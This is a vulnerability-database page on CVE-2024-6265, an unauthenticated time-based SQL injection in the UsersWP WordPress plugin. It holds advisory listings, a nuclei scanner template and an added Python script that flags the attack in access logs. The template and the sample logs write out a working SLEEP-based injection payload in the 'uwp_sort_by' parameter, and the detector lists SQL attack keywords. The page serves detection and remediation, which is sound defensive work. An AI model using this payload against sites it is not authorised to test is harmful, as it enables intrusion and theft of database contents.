| Title | Published | Views | Family |
|---|---|---|---|
| CVE-2024-6265 | 6 Feb 2026 14:59 | – | circl |
| WordPress plugin UsersWP security vulnerability | 29 Jun 2024 00:00 | – | cnnvd |
| CVE-2024-6265 | 29 Jun 2024 04:33 | – | cve |
| CVE-2024-6265 UsersWP – Front-end login form, User Registration, User Profile & Members Directory plugin for WordPress <= 1.2.10 - Unauthenticated SQL Injection via 'uwp_sort_by' | 29 Jun 2024 04:33 | – | cvelist |
| EUVD-2024-47385 | 3 Oct 2025 20:07 | – | euvd |
| CVE-2024-6265 | 29 Jun 2024 05:15 | – | nvd |
| CVE-2024-6265 | 29 Jun 2024 05:15 | – | osv |
| WordPress UsersWP Plugin <= 1.2.10 is vulnerable to SQL Injection | 1 Jul 2024 00:00 | – | patchstack |
| WordPress UsersWP plugin <= 1.2.10 - Unauthenticated SQL Injection via 'uwp_sort_by' vulnerability | 1 Jul 2024 03:48 | – | patchstack |
| PT-2024-37495 · WordPress · Userswp | 29 Jun 2024 00:00 | – | ptsecurity |
| Source | Link |
|---|---|
| nvd | www.nvd.nist.gov/vuln/detail/CVE-2024-6265 |
```yaml
id: CVE-2024-6265

info:
  name: UsersWP <= 1.2.10 - Unauthenticated SQL Injection
  author: Shivam Kamboj
  severity: critical
  description: |
    UsersWP – Front-end login form, User Registration, User Profile & Members Directory plugin for WordPress contains a time-based SQL Injection caused by insufficient escaping of the 'uwp_sort_by' parameter in all versions up to 1.2.10, letting unauthenticated attackers execute arbitrary SQL queries; the exploit requires the attacker to control the 'uwp_sort_by' parameter.
  remediation: |
    Update to version 1.2.11 or later.
  impact: |
    Attackers can extract sensitive database information by executing arbitrary SQL queries, leading to data breach.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-6265
  metadata:
    verified: true
    max-request: 6
    publicwww-query: "/plugins/userswp/"
  tags: cve,cve2024,wordpress,wp,wp-plugin,userswp,sqli,time-based,unauth,vkev

http:
  - raw:
      - |
        @timeout: 10s
        GET {{path}}?uwp_sort_by=display_name,(SELECT+SLEEP(6))_asc HTTP/1.1
        Host: {{Hostname}}

    payloads:
      path:
        - "/users/"
        - "/members/"
        - "/user-list/"
        - "/member-directory/"
        - "/directory/"
        - "/all-users/"
    attack: clusterbomb
    stop-at-first-match: true

    matchers:
      - type: dsl
        dsl:
          - "duration>=6"
          - "status_code == 200"
          - 'contains_any(body, "uwp-users", "uwp_page", "wp-content/plugins/userswp")'
        condition: and
# digest: 4b0a0048304602210083b370da7d6774d11afc34aa8a76c9b47a52c51034fa22a0988641c08c4bb152022100d6c7b85923170542d0072ca61d4506ff0c963b1f3a15c1adb881bb8aee19799f:922c64590222798bb761d5b6d8e72950
```
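The nuclei template above detects the flaw by timing: a request whose `uwp_sort_by` value smuggles `SLEEP(6)` into the ORDER BY clause takes at least six seconds to answer. The same signal is visible in a site's own access logs after the fact. The script below is an added example, not part of the Vulners page or the nuclei template: it parses a few constructed access-log lines (combined log format with a trailing response-time field in milliseconds, which is a common but not universal log configuration) and flags requests to the member-directory paths whose `uwp_sort_by` value does not look like a plain sort key, contains SQL tokens, or took unusually long to serve. The "plain sort key" shape (`<column>_asc` or `<column>_desc`) is inferred from the template's payload and is an assumption about the plugin, not something verified against its source.

```python
import re
from urllib.parse import urlparse, parse_qs

# Constructed sample log lines: combined log format plus a trailing
# response time in milliseconds. Two of the four directory requests
# carry a SLEEP-based payload (one raw, one percent-encoded) and took
# about six seconds; the others are ordinary, fast requests.
SAMPLE_LOG = """\
203.0.113.5 - - [29/Jun/2024:04:40:01 +0000] "GET /members/?uwp_sort_by=display_name_asc HTTP/1.1" 200 18231 120
203.0.113.5 - - [29/Jun/2024:04:40:02 +0000] "GET /members/?uwp_sort_by=display_name,(SELECT+SLEEP(6))_asc HTTP/1.1" 200 18231 6104
198.51.100.7 - - [29/Jun/2024:04:41:10 +0000] "GET /users/?uwp_sort_by=user_registered_desc&uwp_page=2 HTTP/1.1" 200 17992 98
198.51.100.7 - - [29/Jun/2024:04:41:11 +0000] "GET /users/?uwp_sort_by=display_name%2C%28SELECT%20SLEEP%286%29%29_asc HTTP/1.1" 200 18011 6210
192.0.2.9 - - [29/Jun/2024:04:42:00 +0000] "GET /wp-login.php HTTP/1.1" 200 4021 30
"""

# Combined log format with one extra numeric field (response time, ms) at the end.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]+" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) (?P<ms>\d+)$'
)

# Assumption: a legitimate uwp_sort_by value is a single column identifier
# followed by _asc or _desc, e.g. display_name_asc. Anything else is unexpected.
SORT_OK = re.compile(r'^[a-z_]+_(asc|desc)$')

# Tokens that have no business in a sort key: SQL keywords used for
# time-based probing, plus punctuation and whitespace that an identifier
# never contains.
SQL_TOKENS = re.compile(r'\b(select|sleep|benchmark|union)\b|[\s(),\'"]', re.I)


def analyse_line(line, slow_ms=5000):
    """Return a finding dict for a request carrying uwp_sort_by, or None.

    slow_ms defaults to 5000 because the template's probe sleeps for six
    seconds; tune it to the site's normal directory-page latency.
    """
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlparse(m['target'])
    # parse_qs already percent-decodes and turns '+' into a space, so both
    # the raw and the encoded payload end up in the same decoded form.
    values = parse_qs(url.query).get('uwp_sort_by')
    if not values:
        return None
    value = values[0]

    reasons = []
    if not SORT_OK.match(value):
        reasons.append('unexpected_shape')
    if SQL_TOKENS.search(value):
        reasons.append('sql_tokens')
    if int(m['ms']) >= slow_ms:
        reasons.append('slow_response')

    return {
        'ip': m['ip'],
        'ts': m['ts'],
        'path': url.path,
        'value': value,
        'ms': int(m['ms']),
        'reasons': reasons,
    }


def find_suspicious(log_text, slow_ms=5000):
    """Return findings for every line that has at least one reason to look at."""
    hits = []
    for line in log_text.splitlines():
        finding = analyse_line(line, slow_ms)
        if finding and finding['reasons']:
            hits.append(finding)
    return hits


if __name__ == '__main__':
    for hit in find_suspicious(SAMPLE_LOG):
        print(f"{hit['ts']} {hit['ip']} {hit['path']} "
              f"uwp_sort_by={hit['value']!r} {hit['ms']}ms -> {', '.join(hit['reasons'])}")
```

On the sample above, the two benign directory requests produce no finding, while both payload-bearing requests are reported with all three reasons. The shape check is the most robust of the three: it fires on a malformed sort key even when a probe uses a short sleep that stays under the latency threshold, and it is the same allowlist discipline (accept only known column names and a direction) that closes this class of ORDER BY injection in the application itself.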